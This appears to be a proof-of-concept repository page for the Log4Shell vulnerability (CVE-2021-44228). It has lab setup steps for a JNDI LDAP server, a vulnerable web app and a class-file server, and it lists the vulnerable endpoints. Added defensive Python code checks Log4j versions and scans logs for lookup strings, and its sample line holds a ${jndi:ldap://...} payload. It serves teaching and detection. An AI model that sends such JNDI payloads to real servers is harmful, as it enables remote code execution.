
CVE-2021-44228 PoC: Apache Log4j code issue vulnerability

Source

Associated Vulnerability
Title: Apache Log4j code issue vulnerability (CVE-2021-44228)
Description: Apache Log4j is a Java-based open-source logging tool from the Apache Software Foundation (USA). Apache Log4j has a code issue vulnerability: an attacker can craft a data request and send it to a server that uses Apache Log4j, and when that request is written to the log, remote code execution is triggered.

Description
CVE-2021-44228 demo webapp

Readme
# CVE-2021-44228-POC
Yet another CVE-2021-44228 POC

Affected Log4j versions: from 2.0-beta9 up to 2.14.1
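The version range stated above is the kind of thing an inventory script needs to encode exactly, and Log4j version strings carry pre-release tags (2.0-beta9, 2.0-rc1) that a naive string comparison gets wrong. The following is an added example, not code from this repository: it parses Log4j-style versions so that `2.0-beta9 < 2.0-rc1 < 2.0 < 2.0.1`, checks them against the README's range, and classifies constructed `log4j-core-*.jar` file names. It encodes only the range written above; the later back-port releases that were patched (for example 2.12.2 for Java 7) fall inside that numeric range, so treat a hit as a candidate to verify, not a confirmed finding.

```python
"""Classify Log4j 2 version strings against the affected range the README
states (2.0-beta9 up to and including 2.14.1).

Added example, not part of the PoC repository. The jar file names in
CONSTRUCTED_JAR_NAMES are made up for the demonstration.
"""
import re

# Pre-release tags sort before the final release: 2.0-beta9 < 2.0-rc1 < 2.0
PRE_RELEASE_RANK = {"alpha": 0, "beta": 1, "rc": 2}
FINAL_RANK = 3  # a final release ranks above any pre-release of the same number

_VERSION_RE = re.compile(r"^(\d+(?:\.\d+)*)(?:-(alpha|beta|rc)(\d+))?$", re.I)
_JAR_RE = re.compile(r"log4j-core-(.+)\.jar$")


def parse_version(text):
    """Return a tuple that sorts correctly for Log4j-style version strings."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised version: {text!r}")
    numbers = tuple(int(p) for p in m.group(1).split("."))
    numbers += (0,) * (3 - len(numbers))  # "2.0" -> (2, 0, 0)
    if m.group(2):
        pre = (PRE_RELEASE_RANK[m.group(2).lower()], int(m.group(3)))
    else:
        pre = (FINAL_RANK, 0)
    return numbers + pre


AFFECTED_LOW = parse_version("2.0-beta9")   # range as stated in the README
AFFECTED_HIGH = parse_version("2.14.1")


def is_affected(version):
    """True when the version falls inside the README's affected range (inclusive)."""
    return AFFECTED_LOW <= parse_version(version) <= AFFECTED_HIGH


def scan_jar_names(names):
    """Map each log4j-core jar name to whether its version is in the affected range.

    Other jars (log4j-api, unrelated libraries) are ignored: the lookup code
    that CVE-2021-44228 concerns lives in log4j-core."""
    result = {}
    for name in names:
        m = _JAR_RE.search(name)
        if m:
            result[name] = is_affected(m.group(1))
    return result


# Constructed sample input for the demonstration.
CONSTRUCTED_JAR_NAMES = [
    "log4j-core-2.14.1.jar",
    "log4j-core-2.17.1.jar",
    "log4j-core-2.0-beta8.jar",
    "log4j-api-2.14.1.jar",
]

if __name__ == "__main__":
    for jar, affected in scan_jar_names(CONSTRUCTED_JAR_NAMES).items():
        print(f"{jar}: {'AFFECTED' if affected else 'outside stated range'}")
```

Feed `scan_jar_names` the output of a `find / -name 'log4j-core-*.jar'` run (or the entries of a `jar tf` listing of a fat jar) to get a first-pass inventory of hosts that still ship a version inside the stated range.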

## Prerequisites 

Java used: OpenJDK 11
 - https://jdk.java.net/archive/

Maven is required to build the apps in this repo (alternatively, download the prepared jar files from the release page):
 - https://maven.apache.org/

## Building & Running the projects 

Directory layout:
 - jndi - project with the JNDI LDAP Reference server
 - web - project with the vulnerable server
 - provider - project with the code compiler & class-file server
 - resources - directory for additional resources (such as screenshots)

Build projects with: 
```
mvn clean install
```

Run jars with:
```
java -jar <jar>
```

Files to run (generated in <repo_name>/<project_name>/target):
 - jndi-1.0.0-jar-with-dependencies.jar (run with: java -jar jndi-1.0.0-jar-with-dependencies.jar "http://127.0.0.1:8081/#Exploit")
 - web-1.0.0.jar (run with: java -jar web-1.0.0.jar) - runs on port 8080
 - provider-1.0.0.jar (run with: java -jar provider-1.0.0.jar) - runs on port 8081

***Alternatively, build and run the Docker image (see the Docker section below Screenshots).***

## Basic usage

0. Start all projects (as above)
1. Go to http://127.0.0.1:8081/
2. Copy the exploit template and paste it into the Java Code box
3. Go to the vulnerable logger at: http://127.0.0.1:8080/
4. Copy the payload from the example and send it to the logger
5. The calculator app should open (Windows). On Linux and macOS, an empty file named "PWNED" should be created in the /tmp directory

## Description

Currently, the vulnerability can be exploited via:
 - */logAction* -> POST endpoint (triggers with the payload in request headers or the "payload" param)
 - */logGetHeaders* -> GET endpoint (triggers with request headers)
 - */logPut* -> PUT endpoint (triggers with request headers or the request body)
 - */logDelete* -> DELETE endpoint (triggers with request headers or the request body)
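Every trigger listed above is the same pattern from the defender's side: a client-controlled value (a header, a query param, a request body) reaches the logger unchanged, and Log4j resolves any `${name:...}` lookup it contains. The following is an added example, not code from this repository, showing detection logic run over a few constructed access-log lines for these four endpoints. It keys on the lookup syntax itself rather than on the literal string `jndi`: a `${jndi:...}` lookup in client input is the CVE-2021-44228 trigger and is reported with its scheme and host, and any other lookup in such a field is still flagged, because a server should never be asked to resolve lookups on behalf of a client. The `CLIENT METHOD PATH key="value" ...` line format and the LDAP port 1389 are assumptions made for the sample data; the endpoint paths are the ones the README lists.

```python
"""Flag Log4j lookup syntax in client-controlled fields of a web log.

Added example, not code from the PoC repository. The endpoint paths mirror
the README; the log line format and the lines in SAMPLE_LINES are
constructed for the demonstration.
"""
import re

# Every key="value" field after the path is client-supplied: request headers,
# the "payload" param or the request body, depending on the endpoint.
_FIELD = re.compile(r'(\w[\w-]*)="([^"]*)"')
# Start of a Log4j lookup: ${name:...}. Matching the syntax, not the word
# "jndi", also catches lookups that are not jndi and values that are wrapped.
_LOOKUP = re.compile(r"\$\{\s*([A-Za-z]\w*)\s*:")
# For a jndi lookup, pull out the scheme and the host it would contact.
_JNDI_TARGET = re.compile(r"\$\{jndi:([a-z]+)://([^/:}\s]+)", re.I)


def parse_line(line):
    """Split a constructed log line into client, method, path and key/value fields."""
    parts = line.split(" ", 3)
    if len(parts) < 3:
        raise ValueError(f"malformed line: {line!r}")
    rest = parts[3] if len(parts) > 3 else ""
    return {
        "client": parts[0],
        "method": parts[1],
        "path": parts[2],
        "fields": dict(_FIELD.findall(rest)),
    }


def classify_value(value):
    """'critical' for a jndi lookup, 'suspicious' for any other lookup, None if clean."""
    names = {m.group(1).lower() for m in _LOOKUP.finditer(value)}
    if not names:
        return None
    return "critical" if "jndi" in names else "suspicious"


def scan_line(line):
    """Return one finding per client-controlled field that carries a lookup."""
    rec = parse_line(line)
    findings = []
    for key, value in rec["fields"].items():
        level = classify_value(value)
        if level is None:
            continue
        target = _JNDI_TARGET.search(value)
        findings.append({
            "path": rec["path"],
            "field": key,
            "level": level,
            "scheme": target.group(1).lower() if target else None,
            "host": target.group(2) if target else None,
        })
    return findings


def scan(lines):
    """Scan many lines; findings keep the order of the input."""
    return [finding for line in lines for finding in scan_line(line)]


# Constructed sample lines for the four endpoints the README describes.
SAMPLE_LINES = [
    '10.0.0.5 POST /logAction user-agent="Mozilla/5.0" payload="hello"',
    '10.0.0.9 GET /logGetHeaders user-agent="${jndi:ldap://127.0.0.1:1389/Exploit}"',
    '10.0.0.7 PUT /logPut body="order=${date:yyyy}"',
    '10.0.0.7 DELETE /logDelete x-request-id="abc-123"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LINES):
        print(finding)
```

In a real deployment the same two checks belong at the edge (a WAF rule on the `${` lookup syntax in headers and bodies) and in the SIEM over the application logs; the host extracted from a `critical` finding is what to hunt for in outbound LDAP/RMI connection logs from the affected server.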

## Screenshots 

Java version:\
![Java version image](https://github.com/MkTech-0-8YT3/CVE-2021-44228/blob/master/resources/screenshots/javaVer.png)

Exploit preparation + Compilation + Serving class file:\
![Exploit preparation image](https://github.com/MkTech-0-8YT3/CVE-2021-44228/blob/master/resources/screenshots/provider.png)

Payload (to be delivered to log4j) preparation + Sending the payload:\
![Payload image](https://github.com/MkTech-0-8YT3/CVE-2021-44228/blob/master/resources/screenshots/web.png)

JNDI Reference:\
![JNDI Reference image](https://github.com/MkTech-0-8YT3/CVE-2021-44228/blob/master/resources/screenshots/jndiRef.png)

Exploitation result (Windows):\
![Exploitation result (win) image](https://github.com/MkTech-0-8YT3/CVE-2021-44228/blob/master/resources/screenshots/exploitation_win.png)

Exploitation result (GNU/Linux):\
![Exploitation result (lin) image](https://github.com/MkTech-0-8YT3/CVE-2021-44228/blob/master/resources/screenshots/exploitation_lin.png)

## Docker

You can also build a Docker image with the Dockerfile located in the main repo directory.
Instructions:
```
docker build . -t log4j_vuln
docker run -p 8080:8080 -p 8081:8081 log4j_vuln
```

To find the CONTAINER_ID:
```
docker ps
```

To see the exploitation result (inside the container):
```
docker exec -it <CONTAINER_ID> bash
ls -la /tmp
```

Kill the Docker container with:
```
docker container kill <CONTAINER_ID>
```

## Disclaimer

Code presented in this repository is intended to be used **FOR EDUCATIONAL PURPOSES ONLY**.\
I do not aid or endorse any malicious usage of data from this repository.

Additionally, code in this repository is shared on an 'AS IS' BASIS - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND.

## More information

https://www.lunasec.io/docs/blog/log4j-zero-day/
File Snapshot

```
[4.0K] /data/pocs/2b17bc618700351d3eabe460573504f27278cca8
├── [ 729] Dockerfile
├── [4.0K] jndi
│   ├── [1.4K] pom.xml
│   └── [4.0K] src
│       └── [4.0K] main
│           └── [4.0K] java
│               └── [4.0K] com
│                   └── [4.0K] jndi
│                       └── [4.0K] serv
│                           ├── [2.7K] LDAPServer.java
│                           └── [2.8K] OperationInterceptor.java
├── [4.0K] provider
│   ├── [1.3K] pom.xml
│   └── [4.0K] src
│       ├── [4.0K] main
│       │   ├── [4.0K] java
│       │   │   └── [4.0K] com
│       │   │       └── [4.0K] code
│       │   │           └── [4.0K] provider
│       │   │               ├── [ 280] BaseController.java
│       │   │               ├── [1.8K] BaseRestController.java
│       │   │               ├── [ 422] Compiler.java
│       │   │               ├── [1.3K] FileService.java
│       │   │               └── [ 314] ProviderApplication.java
│       │   └── [4.0K] resources
│       │       ├── [  17] application.properties
│       │       └── [4.0K] templates
│       │           └── [1.6K] index.html
│       └── [4.0K] test
│           └── [4.0K] java
│               └── [4.0K] com
│                   └── [4.0K] code
│                       └── [4.0K] provider
│                           └── [ 211] ProviderApplicationTests.java
├── [3.6K] README.md
├── [4.0K] resources
│   ├── [4.0K] docker
│   │   └── [ 183] startup.sh
│   └── [4.0K] screenshots
│       ├── [ 21K] exploitation_lin.png
│       ├── [148K] exploitation_win.png
│       ├── [5.1K] javaVer.png
│       ├── [3.8K] jndiRef.png
│       ├── [ 59K] provider.png
│       └── [ 13K] web.png
└── [4.0K] web
    ├── [1.8K] pom.xml
    └── [4.0K] src
        ├── [4.0K] main
        │   ├── [4.0K] java
        │   │   └── [4.0K] com
        │   │       └── [4.0K] log4shell
        │   │           └── [4.0K] web
        │   │               ├── [ 281] BaseController.java
        │   │               ├── [2.0K] LogController.java
        │   │               └── [ 304] WebApplication.java
        │   └── [4.0K] resources
        │       ├── [   1] application.properties
        │       └── [4.0K] templates
        │           └── [ 945] index.html
        └── [4.0K] test
            └── [4.0K] java
                └── [4.0K] com
                    └── [4.0K] log4shell
                        └── [4.0K] web
                            └── [ 206] WebApplicationTests.java

38 directories, 28 files
```